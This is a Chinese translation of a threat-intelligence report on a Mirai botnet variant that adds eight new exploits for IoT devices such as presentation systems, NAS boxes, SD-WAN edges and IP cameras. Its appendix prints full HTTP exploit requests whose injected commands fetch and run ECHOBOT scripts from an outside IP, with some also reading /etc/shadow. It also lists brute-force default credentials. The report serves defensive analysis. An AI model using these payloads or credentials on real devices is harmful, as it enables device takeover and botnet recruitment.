Mirai变种加入8个漏洞利用,攻击iot设备

作者:深圳市网安计算机安全检测技术有限公司 | 国际 2019/06/11 14:12:15 557
文章来源:https://www.4hou.com/vulnerable/18458.html

摘要

        Palo Alto Networks Unit 42研究人员自2016年开始就一直在持续关注Mirai恶意软件。近期,研究人员发现了Mirai恶意软件的一个新变种,其中加入了8个新的漏洞利用攻击目标还是嵌入式设备。新目标的范围涵盖无线投影系统、机顶盒、SD-WAN、智能家控制器等等。

        Mirai最迟使用默认凭证来获取对设备的访问权。从2017年底开始,该恶意软件家族样本开始使用公开的漏洞利用来在有漏洞的设备上传播和与运行。2018年的攻击活动中也有变种不断加入新的漏洞利用,将不同种类的IoT设备加入到僵尸网络中。

        从那时起,研究人员发现Mirai恶意软件作者在不断测试新的漏洞利用。最新的Mirai变种中就延续了这一趋势。

漏洞利用

最新的Mirai变种一共含有18个漏洞利用,其中8个是新加入的。这些新加入的漏洞利用包括:

· CVE-2019-3929

· OpenDreamBox远程代码执行漏洞

· CVE-2018-6961

· CVE-2018-7841

· CVE-2018-11510

· Dell KACE远程代码执行漏洞

· CVE-2017-5174

· HooToo TripMate 远程代码执行漏洞

新一种中还含有4个之前Mirai变种中使用过的漏洞利用,包括:

· LG Supersign TVs

· WePresent WiPG-1000 Wireless Presentation Systems

· Belkin WeMo devices

· MiCasaVerde VeraLite Smart Home Controllers

        这些新译本中还含有攻击Oracle WebLogic Servers RCE漏洞的漏洞利用,被用于构建Linux和Windows僵尸网络。这些漏洞利用过去都被Mirai变种使用过。

分析

该新变种除了上面提到的漏洞利用外,还有一些新的特征:

· 字符串表所用的加密密钥0xDFDAACFD是基于原始Mirai源代码中的标准加密方案的,这与0x54 XOR的字节序是相同的。

· 而且还有许多用于暴力破解的默认凭证是研究人员之前没见过的。

基础设施

样本所在的开放目录如图1所示:

Mirai变种加入8个漏洞利用,攻击iot设备

图1. 保存Mirai变种的开放目录

变种的样本为C2使用了2个域名,位于不同版本的不同端口:

最新版本使用的C2域名为:

· akuma[.]pw :17

· akumaiotsolutions[.]pw:912

目前这两个域名无法解析到任何IP地址,但是通过搜索Shodan,研究人员发现该地址的端口17同时也被用作C2。下图中来自Mirai C2服务器17端口的响应记录表明C2代码是如何写入原始代码的:

Mirai变种加入8个漏洞利用,攻击iot设备

                                            图2. Shodan搜索结果表明31.13.195[.]251:17被用作C2

        保存恶意软件的目录过一段时间就会更新,最后版本上传的时间为2019年5月26日。每次更新的变化都很小,攻击者要么修改了C2端口号要么稍微修改了payload。

文件上传的时间记录:

· 26-May-2019 10:05

· 21-May-2019 16:34

· 21-May-2019 08:38

· 19-May-2019 06:05

2019年5月21日8点34分上传的版本使用了2个C2域名,为:

· akuma[.]pw:1822

· akumaiotsolutions[.]pw:721

这两个域名也被其他Mirai样本使用过,不同的只是端口:

结论

新发现的Mirai变种是Linux恶意软件开发人员扩展其范围的努力的继续,攻击更大访问、更多数量IOT设备来组成更大规模的僵尸网络来提供更强的DDOS攻击的能力。基于对这些变种的分析,使用漏洞利用是更加高效的,因为感染大量的设备之后可以在之后的变种中继续使用。

附录:8个漏洞利用受影响设备和漏洞利用格式

CVE-2019-3929

漏洞攻击的是多个厂商的Wireless Presentation Systems无线演示系统,漏洞利用格式如下:

POST /cgi-bin/file_transfer.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
 
file_transfer=new&dir=’Pa_Notecd wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*Pa_Note

OpenDreamBox_RCE漏洞

受影响的设备为运行OpenDreamBox 2.0.0的设备,漏洞利用格式如下:

POST /webadmin/script?command=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hello-World
Connection: keep-alive

CVE-2018-6961

漏洞影响设备为VMware NSX SD-WAN Edge版本低于3.1.2的设备,漏洞利用格式为:

POST /scripts/ajaxPortal.lua HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.vmware.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: culture=en-us
Connection: close
 
destination=8.8.8.8$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&source=192.168.0.1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic
name=google.com$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic
destination=8.8.8.8$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic

CVE-2018-7841

漏洞影响Schneider Electric U.motion LifeSpace管理系统,漏洞利用格式为:

POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
 
op=export&language=english&interval=1&object_id=\x60wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\x60

CVE-2018-11510

漏洞影响设备为Asustor NAS设备,漏洞利用格式为:

 Mirai变种加入8个漏洞利用,攻击iot设备

DellKACE_SysMgmtApp_RCE

受影响设备为Dell KACE系统管理应用,漏洞利用格式为:

POST /service/krashrpt.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept: /
User-Agent: Hello-World
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
 
kuid=\x60id | wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\x60

 CVE-2017-5174

漏洞影响Geutebrück IP Cameras,漏洞利用格式为:

POST /uapi-cgi/viewer/testaction.cgi HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
ip: eth0 1.1.1.1; wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*
Accept: /
User-Agent: Hello-World
Connection: keep-alive

HooTooTripMate_RCE

漏洞影响HooToo TripMate路由器,漏洞利用格式为:

POST /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Hello-World
Connection: keep-alive

Mirai新变种中使用的默认凭证

· blueangel/blueangel

· root/abnareum10

· root/Admin@tbroad

· root/superuser

· admin/wbox123

· admin/pfsense

· admin/aerohive

· root/awind5885

· hadoop/123456

· hadoop/hadoop@123

· hadoop/hadoopuser

· root/ikwd

        本文翻译自:https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/


推荐关注

指导单位
广东省公安厅网络警察总队 广东省信息安全等级保护协调小组办公室